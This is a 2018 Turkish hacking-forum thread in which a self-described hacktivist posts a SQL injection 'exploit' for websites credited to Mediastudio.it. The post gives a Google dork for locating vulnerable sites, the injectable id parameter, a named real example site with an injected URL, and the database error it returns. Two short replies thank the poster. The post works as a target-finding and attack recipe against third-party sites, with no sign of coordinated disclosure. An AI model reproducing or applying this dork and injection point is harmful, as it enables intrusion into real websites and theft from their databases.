Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Credits Mediastudio.it Web Hosting SQL Inj Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,377 / 1,377
Deneyim: 8 / 100
Rep Sayısı: 2785
Mesaj Sayısı: 6381
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Credits Mediastudio.it Web Hosting SQL Inj Vuln
18.09.2018 21:37
################################################################################​#################

# Exploit Title : Credits Mediastudio.it Web Hosting SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/09/2018
# Vendor Homepage : mediastudio.it
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Google Dork :

intext:''Credits: Mediastudio''

# Exploit :

/project-dettaglio.php?id=[SQL Injection]

################################################################################​#################

# Example Site => modulnova.com/project-dettaglio.php?id=1%27 => [ Proof of Concept ] => archive.is/Ukvo7

# SQL Database Error =>

Errornumber: 1064 Errormessage: You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near 'AND Visibile=1 ORDER BY Posizione' at line 1

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti
DoraTheAura
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 1
Yaşam Puanı: 1 / 21
Deneyim: 86 / 100
Rep Sayısı: 0
Mesaj Sayısı: 9
Üyelik Tarihi: 21.09.2018
     
Yorum: #2
Cvp: Credits Mediastudio.it Web Hosting SQL Inj Vuln
21.09.2018 15:06
Ellerine sağlık
Alinti
blackmanisa
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 1
Yaşam Puanı: 0 / 0
Deneyim: 2 / 100
Rep Sayısı: 0
Mesaj Sayısı: 2
Üyelik Tarihi: 28.09.2014
     
Yorum: #3
RE: Credits Mediastudio.it Web Hosting SQL Inj Vuln
22.09.2018 16:53
Teşekkürler, Emeğine Sağlık Smile
Alinti



1 Ziyaretçi